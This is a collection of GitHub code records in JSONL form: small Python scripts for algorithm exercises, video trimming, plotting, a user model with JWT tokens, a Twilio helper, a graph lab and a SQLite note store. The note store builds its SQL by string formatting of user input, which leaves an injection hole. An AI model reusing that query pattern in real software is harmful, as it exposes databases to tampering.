+{"seq_id":"26771226040","text":"import math\n\nM = int(input())\nN = int(input())\n\nprimeNumber = [True] * (N+1)\n\nprimeNumber[0] = False\nprimeNumber[1] = False\n\nrootN = math.sqrt(N)\nfor i in range(2,int(rootN)+1):\n j = 2\n if primeNumber:\n while (i*j) <= N:\n primeNumber[i*j] = False\n j += 1\n\n\nminPrime = N+1\nsum = 0\n\nfor index in range(M, N+1):\n if primeNumber[index]:\n sum += index\n minPrime = index if minPrime > index else minPrime\n\nprint(-1 if sum==0 else str(sum)+\"\\n\"+str(minPrime))\n\n","repo_name":"CNU-ANT/2018-Algorithm_Study","sub_path":"180502/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28718883003","text":"#210320 mp4SilenceSkipper/SagaUniv SE-Phys 19238032 Kai ISHIZUKA @firestarter2501\n#Install FFmpeg and pass the file path before running it!\n#To be used with appropriate changes to noise, duration, silencedetect, etc.\n\nimport subprocess\nimport os\nimport glob\n\n#Obtaining the original video material\ndef mk_movieList(movie_folder):\n files = os.listdir(movie_folder)\n files = [x for x in files if x[-4:] == '.mp4']\n files = [x for x in files if x[0] != '.']\n return files\n\ndef mk_starts_ends(wk_dir,movie):\n os.chdir(wk_dir)\n output = subprocess.run([\"ffmpeg\",\"-i\",movie,\"-af\", \"silencedetect=noise=-30dB:duration=2\",\"-f\",\"null\",\"-\"], stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n s = str(output)\n lines = s.split('\\\\n')\n time_list = []\n for line in lines:\n if \"silencedetect\" in line:\n words = line.split(\" \")\n for i in range(len(words)):\n if \"silence_start\" in words[i]:\n time_list.append(float((words[i+1]).replace('\\\\r',''))+2)\n if \"silence_end\" in words[i]:\n time_list.append(float((words[i+1]).replace('\\\\r',''))-2)\n\n print(time_list)\n starts_ends = list(zip(*[iter(time_list)]*2))\n return starts_ends\n\ndef mk_jumpcut(wk_dir,movie,starts_ends):\n os.chdir(wk_dir)\n for i in range(len(starts_ends)-1):\n movie_name = movie.split(\".\")\n splitfile = \"./JumpCut/\" + movie_name[0] + \"_\" + str(i) + \".mp4\"\n print(splitfile)\n output = subprocess.run([\"ffmpeg\", \"-i\",movie,\"-ss\",str(starts_ends[i][1]),\"-t\",str(starts_ends[i+1][0]-starts_ends[i][1]),splitfile],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n\n#Merge videos\ndef join_movie(movie_files,out_path):\n videos = glob.glob(movie_files)\n print(videos)\n\n #List of join targets\n with open(\"JumpCut/tmp.txt\",\"w\") as fp:\n lines = [f\"file '{os.path.split(line)[1]}'\" for line in videos]\n #Prevented from becoming 1,10,11,~, Sorted\n lineList = sorted(lines,key=len)\n fp.write(\"\\n\".join(lineList))\n\n output = subprocess.run([\"ffmpeg\",\"-f\",\"concat\",\"-i\",\"JumpCut/tmp.txt\",\"-c\",\"copy\",out_path],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n print(output)\n\n#Specifying a directory\nprint(\"Specify the directory of the original video by absolute path. ex. /Users/kishi/Downloads/\")\nmovie_folder = input()\nprint(\"Enter the absolute path of the folder where you want to output the video *.mp4 ex. /Users/kishi/Downloads/*.mp4\")\nmovie_files = input()\nout_path = \"join_out.mp4\"\n\nos.chdir(movie_folder)\nwk_dir = os.path.abspath(\".\")\ntry:\n os.mkdir(\"JumpCut\")\nexcept:\n pass\n\nmovie_list = mk_movieList(movie_folder)\n\nfor movie in movie_list:\n print(movie)\n starts_ends = mk_starts_ends(wk_dir,movie)\n print(starts_ends)\n mk_jumpcut(wk_dir,movie,starts_ends)\n join_movie(movie_files,out_path)\n print(movie_files,out_path)\n","repo_name":"firestarter2501/mp4SilenceSkipper","sub_path":"mp4SilenceSkipper.py","file_name":"mp4SilenceSkipper.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36305702388","text":"# Q36 「0」と「7」の回文数\n\n# 0 or 7 で構成される数字のジェネレータ\ndef gen_70num():\n num = 1\n while True:\n yield int(bin(num)[2:]) * 7\n num += 1\n\n# num: int, candidates: set(int)\n# candidates のうち、num の因数である数字の集合を返す\ndef search_factors(num, candidates):\n results = set()\n for i in candidates:\n if num % i == 0:\n results.add(i)\n return results\n\ndef main():\n count = 0\n candidates = set(range(1, 51))\n candidates.remove(13)\n results = {} # key: gen_70num で生成された数字, value: key の因数の集合\n for num in gen_70num():\n factors = search_factors(num, candidates)\n results[num] = factors\n candidates -= factors\n count += 1\n if candidates == set() or count > 10000:\n break\n count = 0\n for key in results.keys():\n if str(key) == str(key)[::-1]:\n factors = results[key]\n for num in factors:\n print(\"{:2d} * {:d} = {:d}\".format(num, key // num, key))\n count += 1\n print(\"TOTAL:\", count, \"cases\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"takecap/70puzzles","sub_path":"src/q36_1.py","file_name":"q36_1.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31803823370","text":"import json\nimport tempfile\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nimport pytest\nimport sagemaker\n\nfrom deepcell.cli.modules.cloud.train import CloudKFoldTrainRunner\nfrom deepcell.cloud.ecr import ECRUploader\nfrom deepcell.cloud.train import KFoldTrainingJobRunner\nfrom deepcell.testing.util import get_test_data\n\n\nclass TestTrainCLI:\n @classmethod\n def setup_class(cls):\n data_dir = tempfile.TemporaryDirectory()\n\n cls.dataset = get_test_data(write_dir=data_dir.name, exp_id='0')\n cls.data_dir = data_dir\n\n def teardown_class(self):\n self.data_dir.cleanup()\n\n @patch(\"boto3.session\")\n @patch('docker.APIClient')\n @patch('deepcell.cloud.train.get_sagemaker_execution_role_arn',\n return_value='')\n @patch.object(KFoldTrainingJobRunner,\n '_wait_until_training_jobs_have_finished')\n @patch.object(KFoldTrainingJobRunner, '_upload_local_data_to_s3')\n @patch.object(sagemaker.estimator.Estimator, '__init__', return_value=None)\n @patch.object(sagemaker.estimator.Estimator, 'fit')\n @patch.object(ECRUploader, '_docker_login', return_value=('', ''))\n @pytest.mark.parametrize('local_mode', [True, False])\n def test_cli(self, _, __, ___, ____, _____, ______, _______, ________,\n local_mode):\n \"\"\"Smoke tests the CLI\"\"\"\n instance_type = 'local' if local_mode else 'ml.p3.2xlarge'\n\n with tempfile.TemporaryDirectory() as temp_path:\n with open(Path(temp_path) / 'model_inputs.json', 'w') as f:\n json.dump(self.dataset, f)\n\n with open(Path(temp_path) / 'model_inputs.json', 'r') as f:\n train_params = {\n 'n_folds': 2,\n 'model_inputs_path': f.name,\n 'save_path': temp_path,\n 'optimization_params': {\n 'n_epochs': 3\n }\n }\n\n input_data = {\n 'train_params': train_params,\n 'instance_type': instance_type\n }\n trainer = CloudKFoldTrainRunner(\n input_data=input_data, args=[])\n trainer.run()\n","repo_name":"AllenInstitute/DeepCell","sub_path":"tests/cli/modules/cloud/test_cloud_train_cli.py","file_name":"test_cloud_train_cli.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"1298795654","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfile = 'tmp100'\n\n\ndata = np.loadtxt(file + '.txt')\n\nx = data[:, 0]\ny = data[:, 1]\n\nplt.hist2d(x, y, bins=200, cmap=plt.cm.jet)\n\n\nplt.savefig(file + '.pdf')\n","repo_name":"LouisHurschler/statPhys","sub_path":"exercises/ex06/exe/plot/plot_mueller.py","file_name":"plot_mueller.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72603692699","text":"# 1193 분수찾기\n\nx = int(input())\n\nline = 0 # 해당 줄 번호\nend_index = 0 # 해당 line의 마지막 num의 인덱스번호\n\nwhile end_index < x:\n line += 1\n end_index += line\n\nnum = end_index - line # line=짝수: x와 top의 차, line=홀수: x와 bottom의 차\n\nif line % 2 == 0: # line이 짝수일 때\n top = x - num\n bottom = line - top + 1\nelse: # line이 홀수일 때\n bottom = x - num\n top = line - (bottom) + 1\n\nprint(f\"{top}/{bottom}\")\n","repo_name":"Beanxx/Python-Algorithm","sub_path":"Baekjoon/8. 기본 수학 1/1193.py","file_name":"1193.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5629448114","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n--------------------------------------\n @Author :慕凡\n @Date :2021/7/28 11:28\n @Project: py37-学习 \n---------------------------------------\n\"\"\"\nimport pymysql\nimport os\n\nfrom common.myConf import MyConf\nfrom common.my_path import mysql_path\n\n\nclass MyMysql:\n\n def __init__(self):\n # 实例化配置类对象\n conf = MyConf(mysql_path)\n # 1、连接mysql数据库 - 占用数据库资源\n self.db = pymysql.connect(\n user=conf.get(\"mysql\", \"user\"),\n password=conf.get(\"mysql\", \"password\"),\n host=conf.get(\"mysql\", \"host\"),\n database=conf.get(\"mysql\", \"database\"),\n port=conf.getint(\"mysql\", \"port\"),\n charset=\"utf8\",\n cursorclass=pymysql.cursors.DictCursor\n )\n # 2、创建游标\n self.cur = self.db.cursor()\n\n def get_count(self, sql):\n return self.cur.execute(sql)\n\n def get_one_data(self, sql):\n self.cur.execute(sql)\n return self.cur.fetchone()\n\n def get_many_data(self, sql, size=None):\n self.cur.execute(sql)\n if size:\n return self.cur.fetchmany(size)\n else:\n return self.cur.fetchall()\n\n def close_conn(self):\n self.cur.close()\n self.db.close()\n\n def update_data(self):\n # 事务\n # 提交commit 回滚 rollback\n self.cur.execute()\n\n\nif __name__ == '__main__':\n conn = MyMysql()\n num = conn.get_count(\"select * from member where mobile_phone = '18243051705'\")\n print(num)\n conn.close_conn()\n\n","repo_name":"lff1988/day12","sub_path":"common/my_mysql.py","file_name":"my_mysql.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42004053250","text":"import base64\nimport json\nimport os\nimport secrets\nimport time\nfrom hashlib import md5\nfrom typing import List, Optional\n\nfrom authlib.jose import jwt\nfrom passlib.apps import custom_app_context as pwd_context\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlmodel import Field, Relationship, SQLModel, select\n\nfrom app.config.config import settings\nfrom app.models import Friend\n\n\nclass User(SQLModel, table=True):\n \"\"\"\n User\n \"\"\"\n\n __tablename__ = \"User\"\n id: Optional[int] = Field(default=None, primary_key=True)\n username: str = Field(default=None, index=True, unique=True)\n email: str\n password_hash: str\n salt: str\n about_me: Optional[str] = Field(default=None)\n origin: int\n email_verified: bool = Field(default=False)\n default_avatar: bool = Field(default=True)\n best_score_single_bird: int = Field(default=0)\n best_score_double_bird: int = Field(default=0)\n total_flutters: int = Field(default=0)\n total_pipes_cleared: int = Field(default=0)\n total_games: int = Field(default=0)\n achievements: str = Field(default=\"{}\")\n platform: int = Field(default=0) # 0 = undefined, 1 = web, 2 = IOS/Android, 3 = Both\n\n tokens: List[\"UserToken\"] = Relationship(back_populates=\"user\")\n\n friends: List[\"Friend\"] = Relationship(\n back_populates=\"friend\",\n sa_relationship_kwargs={\n \"primaryjoin\": \"User.id==Friend.user_id\",\n },\n )\n followers: List[\"Friend\"] = Relationship(\n back_populates=\"follower\",\n sa_relationship_kwargs={\n \"primaryjoin\": \"User.id==Friend.friend_id\",\n },\n )\n\n def hash_password(self, password):\n salt = secrets.token_hex(8)\n self.salt = salt\n self.password_hash = pwd_context.hash(password + salt)\n\n def verify_password(self, password):\n # If the user has any other origin than regular it should not get here\n # because the verification is does elsewhere. So if it does, we return False\n if self.origin != 0:\n return False\n else:\n return pwd_context.verify(password + self.salt, self.password_hash)\n\n def befriend(self, user):\n # Only call if the Friend object is not present yet.\n friend = Friend(user_id=self.id, friend_id=user.id, friend_name=user.username)\n return friend\n\n async def is_friend(self, db: AsyncSession, user):\n if user:\n friend_statement = select(Friend).filter_by(user_id=self.id, friend_id=user.id)\n results = await db.execute(friend_statement)\n friend = results.first()\n if friend:\n return friend.Friend.accepted\n else:\n return False\n else:\n return False\n\n def generate_auth_token(self, expires_in=1800):\n # also used for email password reset token\n payload = {\n \"id\": self.id,\n \"iss\": settings.JWT_ISS,\n \"aud\": settings.JWT_AUD,\n \"sub\": settings.JWT_SUB,\n \"exp\": int(time.time()) + expires_in, # expiration time\n \"iat\": int(time.time()), # issued at\n }\n return jwt.encode(settings.header, payload, settings.jwk)\n\n def logged_in_web(self):\n # If the user has played on mobile this variable will be 2.\n # Now the user is on web, so we set it to 3. Which is the final state.\n if self.platform == 2:\n self.platform = 3\n return 2\n # If the value is undefined we set the variable to 1, which is web.\n elif self.platform == 0:\n self.platform = 1\n return 1\n return 0\n\n def logged_in_mobile(self):\n # If the user has played on web this variable will be 1.\n # Now the user is on mobile, so we set it to 3. 
Which is the final state.\n if self.platform == 1:\n self.platform = 3\n return 2\n # If the value is undefined we set the variable to 2, which is mobile.\n elif self.platform == 0:\n self.platform = 2\n return 1\n return 0\n\n def generate_refresh_token(self, expires_in=345600):\n payload = {\n \"user_name\": self.username,\n \"iss\": settings.JWT_ISS,\n \"aud\": settings.JWT_AUD,\n \"sub\": settings.JWT_SUB,\n \"exp\": int(time.time()) + expires_in, # expiration time\n \"iat\": int(time.time()), # issued at\n }\n return jwt.encode(settings.header, payload, settings.jwk)\n\n def is_verified(self):\n return self.email_verified\n\n def verify_user(self):\n self.email_verified = True\n\n def avatar_filename(self):\n return md5(self.email.lower().encode(\"utf-8\")).hexdigest()\n\n def avatar_filename_small(self):\n return self.avatar_filename() + \"_small\"\n\n def avatar_filename_default(self):\n return self.avatar_filename() + \"_default\"\n\n def set_new_username(self, new_username):\n self.username = new_username\n\n def set_default_avatar(self, value):\n self.default_avatar = value\n\n def is_default(self):\n return self.default_avatar\n\n def get_user_avatar(self, full=False):\n if self.default_avatar:\n file_name = self.avatar_filename_default()\n else:\n if full:\n file_name = self.avatar_filename()\n else:\n file_name = self.avatar_filename_small()\n file_folder = settings.UPLOAD_FOLDER_AVATARS\n\n file_path = os.path.join(file_folder, \"%s.png\" % file_name)\n if not os.path.isfile(file_path):\n return None\n else:\n with open(file_path, \"rb\") as fd:\n image_as_base64 = base64.encodebytes(fd.read()).decode()\n return image_as_base64\n\n def get_friend_ids(self):\n return [friend.serialize_minimal for friend in self.friends]\n\n @property\n def serialize(self):\n # Get detailed user information, mostly used for login\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"verified\": self.email_verified,\n \"friends\": self.get_friend_ids(),\n \"avatar\": self.get_user_avatar(True),\n \"score\": {\n \"total_flutters\": self.total_flutters,\n \"total_pipes_cleared\": self.total_pipes_cleared,\n \"total_games\": self.total_games,\n \"best_score_single_bird\": self.best_score_single_bird,\n \"best_score_double_bird\": self.best_score_double_bird,\n },\n \"achievements\": json.loads(self.achievements),\n }\n\n @property\n def serialize_get(self):\n # get user details without personal information\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"avatar\": self.get_user_avatar(True),\n \"score\": {\n \"total_flutters\": self.total_flutters,\n \"total_pipes_cleared\": self.total_pipes_cleared,\n \"total_games\": self.total_games,\n \"best_score_single_bird\": self.best_score_single_bird,\n \"best_score_double_bird\": self.best_score_double_bird,\n },\n \"achievements\": json.loads(self.achievements),\n }\n\n @property\n def serialize_minimal(self):\n # get minimal user details\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"avatar\": self.get_user_avatar(False),\n }\n\n @property\n def serialize_no_detail(self):\n # used after account creation before there is an avatar and when all the scores are 0\n return {\n \"id\": self.id,\n \"username\": self.username,\n \"score\": {\n \"total_flutters\": 0,\n \"total_pipes_cleared\": 0,\n \"total_games\": 0,\n \"best_score_single_bird\": 0,\n \"best_score_double_bird\": 0,\n },\n \"achievements\": {},\n 
}\n","repo_name":"Grabot/flutterbird_backend","sub_path":"app/app/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27470741829","text":"\nimport numpy as np \n\nX= np.array([0,1,2,3,4])\ny= np.array([1,3,7,13,21])\n\n\n# initialize parameters and keep w0 constant \n# we want to visualise RSS with respect to one dimension of parameter \n# for 2 dimension that is for both w0 and w1, RSS will become like mesh grid\nw0=0.\nw1=-40.\n\nRSS= {} # keys will be RSS and values will be w1 i.e. slope\nepochs= 50\nw1steps=2.\nfor epoch in range (epochs):\n SumSqErrors = 0\n for i in range(len(X)): # to loop over all data points to calculate sum of square of error\n y_predicted = w0 + w1 * X[i]\n error= y[i] - y_predicted\n SqError= error**2\n SumSqErrors += SqError\n # add this Error sq sum as key and corresponding parameters (w0,w1) as values\n RSS[SumSqErrors] = w1\n # chnage w1\n w1= w1 + w1steps\n\nimport matplotlib.pyplot as plt \n\nplt.scatter(RSS.values(),RSS.keys())\nplt.xlabel('w1')\nplt.ylabel('RSS value')\nplt.show()\n\nprint(RSS.keys())","repo_name":"Omnish22/Machine_Learning","sub_path":"2_MinRSS.py","file_name":"2_MinRSS.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25853381971","text":"# Download the helper library from https://www.twilio.com/docs/python/install\r\ndef send_sms(body, sender, to):\r\n from twilio.rest import Client\r\n\r\n\r\n # Your Account Sid and Auth Token from twilio.com/console\r\n # and set the environment variables. See http://twil.io/secure\r\n account_sid = ''\r\n auth_token = ''\r\n client = Client(account_sid, auth_token)\r\n\r\n message = client.messages \\\r\n .create(\r\n body=body,\r\n from_=sender,\r\n to=to\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n send_sms(body, sender, to)\r\n","repo_name":"carey5/BestBuyCA_Item_Avail","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20637770561","text":"#w grupie poniedziałkowej numpy było niepotrzebne, ale lepiej użyć.\nimport numpy as np\nfrom Grafy1Funkcje import *\nfrom random import seed\n\nvertices = [\"a\", \"b\", \"c\", \"d\", \"e\"]\nmatrix = np.array([[0,1,1,0,0],[0,0,1,0,0],[0,0,0,1,1],[0,0,0,0,1],[0,0,0,0,0]])\n#poniedziałkowa: matrix = [[0,1,1,0,0],[0,0,1,0,0],[0,0,0,1,1],[0,0,0,0,1],[0,0,0,0,0]]\n#aktualne rozwiązanie powinno być lepsze\n\nprint(matrix) # wypisuje macierz\nprint_matrix(vertices,matrix) #wypisuje graf z nazwami wierzchołków\nprint_matrix([],matrix) #wypisuje graf nazywając wierzchołki liczbami 1,2,...n\nprint(\"\")\n\n#graf w formie słownika/listy sąsiedztwa - będziemy tę formę preferować.\ngraph = {'A': ['B', 'C'],\n 'B': ['C', 'D'],\n 'C': ['D'],\n 'D': ['C'],\n 'E': ['F'],\n 'F': ['C']}\nprint(graph)\nprint_graph(graph)\nprint(\"\")\n\n#graf w formie słownika tworzony od podstaw, krok po kroku\ngraph = {}\nadd_arc(graph, (\"a\", \"b\"))\nadd_arc(graph, (\"a\", \"c\"))\nadd_arc(graph, (\"b\", \"c\"))\nadd_arc(graph, (\"c\", \"d\"))\nadd_vertex(graph, \"e\")\nprint_graph(graph)\nprint(\"\")\n\n#graf losowy - wykorzystanie funkcji\n#ustawienie tzw. ziarna generatora liczb losowych\n#dzięki temu wyniki są powtarzalne (można wstawić inną liczbę)\n#brak użycie seed() - wyniki będą nie do powtórzenia\nseed(2019)\nrandom_graph = random_graph(10, 1/5)\nprint_graph(random_graph)\nprint(\"\")\n\n#graf skierowny z pliku lista.txt (lista łuków)\ngraph = graph_from_edges(\"lista.txt\", 1)\nprint_graph(graph)\n\n#zapisany do pliku graf.txt (lista sąsiadów)\ngraph_to_neighbourslist(graph, \"graf.txt\")\n\n#wczytany z pliku graf.txt (lista sąsiedów) jako graf nieskierowany\nprint_graph(graph_from_neighbourslist(\"graf.txt\"))","repo_name":"kazzzz65/GrafyLab","sub_path":"Grafylab/venv/Grafy1Test.py","file_name":"Grafy1Test.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8823320201","text":"#!/usr/bin/env python3\n\nimport random\nimport sys\nfrom subprocess import getoutput\n\nprenoms = ['Abdallah', 'Abdel', 'Adelaide', 'Adrien', 'Agnes', 'Alaric',\n 'Ali', 'Ali', 'Alienor', 'Alix', 'Alphonse', 'Alphonse', 'Alwin',\n 'Amaury', 'Amedee', 'Amin', 'Amina', 'Anastase', 'Anastase',\n 'Anastasie', 'Anastasie', 'Ariane', 'Arnaud', 'Arnaut', 'Arthur',\n 'Arthur', 'Astrid', 'Aubin', 'Aude', 'Aude', 'Audoin', 'Augustin',\n 'Aure', 'Avit', 'Avit', 'Aymar', 'Bathilde', 'Bathilde', 'Baudoin',\n 'Baudry', 'Beatrice', 'Beatrice', 'Benedicte', 'Benedicte',\n 'Benoit', 'Berenger', 'Bernard', 'Bernard', 'Berthe', 'Berthe',\n 'Bertille', 'Bertille', 'Bertrand', 'Bertrand', 'Bilal', 'Blanche',\n 'Blanche', 'Boniface', 'Boniface', 'Brice', 'Brunhild', 'Cassius',\n 'Catherine', 'Catherine', 'Charles', 'Charles', 'Childebert',\n 'Clodomir', 'Clotaire', 'Clotaire', 'Clotilde', 'Clotilde', 'Cloud',\n 'Cloud', 'Clovis', 'Colin', 'Colomban', 'Colombe', 'Colombe',\n 'Constance', 'Constance', 'Constantin', 'Crepin', 'Cyrielle',\n 'Dagobert', 'Didier', 'Djafar', 'Domitille', 'Edouard', 'Edouard',\n 'Edwin', 'Elisabeth', 'Elizabeth', 'Eloi', 'Eloi', 'Eloise',\n 'Elvira', 'Emeline', 'Emeline', 'Emma', 'Engueran', 'Enguerrand',\n 'Eric', 'Ermeline', 'Etienne', 'Etienne', 'Eudes', 'Eudes',\n 'Eulalie', 'Eulalie', 'Evrard', 'Fatima', 'Fatima', 'Ferdinand',\n 'Fernand', 'Fernande', 'Fiacre', 'Fiacre', 'Firmin', 'Firmin',\n 'Flavien', 'Flavien', 'Florentin', 'Florentin', 'Foulques',\n 'Frederic', 'Frederic', 'Fulbert', 'Garcia', 'Gaspard', 'Gaston',\n 'Gaston', 'Gaultier', 'Gauthier', 'Gautier', 'Gauvin', 'Genevieve',\n 'Geoffroy', 'Geoffroy', 'Gerald', 'Germain', 'Germain', 'Gertrude',\n 'Gertrude', 'Gilbert', 'Gilbert', 'Gildas', 'Gildas', 'Gisele',\n 'Goery', 'Gontran', 'Gontran', 'Gregoire', 'Gregoire', 'Guenievre',\n 'Guillaume', 'Guillaume', 'Guy', 'Gysele', 'Hadi', 'Hafsa',\n 'Halima', 'Haroun', 'Hassan', 'Heloïse', 'Hermance', 'Hermine',\n 'Hildegarde', 'Hisham', 'Hubert', 'Hubert', 'Hugues', 'Hugues',\n 'Hussein', 'Ida', 'Idriss', 'Irene', 'Isaac', 'Isabel', 'Isabelle',\n 'Iseult', 'Isidore', 'Jean', 'Jeanne', 'Jeanne', 'Jehanne',\n 'Jimena', 'Joséphine', 'Julien', 'Justin', 'Justine', 'Justinien',\n 'Khadidja', 'Lancelot', 'Louis', 'Louis', 'Louise', 'Lubin',\n 'Mahaut', 'Malvina', 'Mansour', 'Marcus', 'Margaux', 'Margaux',\n 'Margot', 'Margot', 'Marguerite', 'Maria', 'Maria', 'Mathilde',\n 'Mathilde', 'Maurice', 'Maurice', 'Maurin', 'Melusine', 'Merlin',\n 'Morgane', 'Musa', 'Nestor', 'Norbert', 'Ode', 'Ode', 'Odeline',\n 'Odile', 'Odile', 'Odilon', 'Ogier', 'Olivier', 'Omar', 'Omer',\n 'Omer', 'Oswald', 'Pacome', 'Pacome', 'Paul', 'Paulin', 'Paulin',\n 'Penda', 'Pepin', 'Pepin', 'Perceval', 'Petrus', 'Philibert',\n 'Philibert', 'Philippe', 'Philippe', 'Pierre', 'Pierre', 'Pierrick',\n 'Radegonde', 'Raoul', 'Raoul', 'Raymond', 'Remi', 'Renaud',\n 'Richard', 'Robert', 'Robert', 'Robin', 'Robin', 'Roger', 'Roland',\n 'Roland', 'Romain', 'Romaric', 'Samson', 'Sawda', 'Sebastien',\n 'Sigismond', 'Stanislas', 'Sylvia', 'Tancrede', 'Tanguy', 'Tarik',\n 'Tariq', 'Tassilo', 'Theodore', 'Thibaud', 'Thibert', 'Thierry',\n 'Thierry', 'Tiphaine', 'Tiphaine', 'Tristan', 'Ulric', 'Ulrich',\n 'Urbain', 'Ursula', 'Ursule', 'Venance', 'Venance', 'Veneranda',\n 'Victoire', 'Vincent', 'Vincent', 'Virgile', 'Waldo', 'Wilfrid',\n 'Wilfried', 'William', 'Yazid', 'Zacharia', 'Zacharie']\n\nnoms = ['fils de Martin', 'Langlois', 'Anglais', 'Duchesne', 'du Chêne',\n 'Marchand', 'Boulanger', 'le 
Chauve', 'Courtois', 'Ageorges',\n        'Aubernard', 'Alamartine', 'le fils à Georges', 'le fils au Bernard',\n        'Fromentin', 'Rabier', 'Coulomb', 'Coulon', 'Cabrera', 'Poudevigne',\n        'Messonnier', 'Métivier', 'Pelletier', 'Larsonneur', 'Legros',\n        'Lenain', 'Sarrazin', 'Chauvin', 'Roux']\n\nobjets = ['une pelle', 'un pic', 'une besace', 'une pomme', 'une poule', 'un cheval',\n          'une vache', 'une chèvre', 'un chacal', 'un sac de blé', 'un rubis',\n          \"un savon\", \"une balle de cuir\", \"une couverture\", \"un caillou brillant\",\n          'une opale', 'un bâton de marche', 'une besace', 'un tabouret', 'une épingle',\n          'une ceinture', 'un heaume']\n\n\ndef gen(nbLignes, nbDuRoi, probaPaye):\n    detteDuDuc = 0\n    nbImpayes = 0\n    L = []\n    for i in range(random.randint(int(nbLignes*0.9), int(nbLignes*1.1))):\n        nom = random.choice(prenoms) + ' ' + random.choice(noms)\n        objet = random.choice(objets)\n        prix = random.randint(2, 5)\n\n        if random.random() <= probaPaye:\n            finale = ' -- PAYÉ.'\n            paye = True\n        else:\n            finale = '.'\n            paye = False\n            nbImpayes += 1\n\n        if i == 0 or random.randint(1, nbLignes) <= nbDuRoi:\n            nom = \"Le Duc\"\n            if not paye:\n                detteDuDuc += prix\n        L.append(\"{} m'a acheté {} pour {} piécettes{}\".format(nom, objet, prix, finale))\n    print('\\n'.join(L))\n    getoutput(\"echo -n {} | sha1sum | cut -c 1-40 > $GASH_TMP/detteDuDuc\".format(detteDuDuc))\n    getoutput(\"echo -n {} | sha1sum | cut -c 1-40 > $GASH_TMP/nbImpayes\".format(nbImpayes))\n\n\nif __name__ == '__main__':\n    n = int(sys.argv[1]) if len(sys.argv) >= 2 else 100\n    nbRoi = int(sys.argv[2]) if len(sys.argv) >= 3 else 10\n    pp = float(sys.argv[3]) if len(sys.argv) >= 4 else 0.2\n    gen(n, nbRoi, pp)\n","repo_name":"Theosakamg/GameShell","sub_path":"missions/33_pipe_1/bin/genParchemin.py","file_name":"genParchemin.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"13808737429","text":"import sqlite3\nfrom dataclasses import dataclass\n\nclass Database:\n\n def __init__(self, file):\n self.conn = sqlite3.connect(file + '.db')\n self.conn.execute('CREATE TABLE IF NOT EXISTS note ( id INTEGER PRIMARY KEY, title TEXT DEFAULT NULL, content TEXT NOT NULL);')\n\n def add(self, note):\n self.conn.execute(\"INSERT INTO note (title, content) VALUES (%s, %s);\" % (\"'{}'\".format(note.title) if note.title else \"''\", \"'{}'\".format(note.content)))\n self.conn.commit()\n\n def get_all(self):\n notes = []\n cursor = self.conn.execute(\"SELECT id, title, content FROM note\")\n for linha in cursor:\n id = linha[0]\n title = linha[1]\n content = linha[2]\n notes.append(Note(id, title, content))\n return notes\n\n def update(self, entry):\n self.conn.execute(\"UPDATE note SET title = %s, content = '%s' WHERE id = '%s'\" % (\"'{}'\".format(entry.title) if entry.title else \"NULL\", entry.content, entry.id))\n self.conn.commit()\n\n def delete(self, note_id):\n self.conn.execute(\"DELETE FROM note WHERE id = %s\" % (note_id))\n self.conn.commit()\n\n@dataclass\nclass Note:\n id: int = None\n title: str = None\n content: str = ''\n\n\n\n# k = Note(5, content='asdf')\n# print(\"INSERT INTO note (title, content) VALUES (%s, %s);\" % (\"'{}'\".format(k.title) if k.title else \"'NULL'\", \"'{}'\".format(k.content)))\n","repo_name":"jpfa1406/ProjetoA","sub_path":"data/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
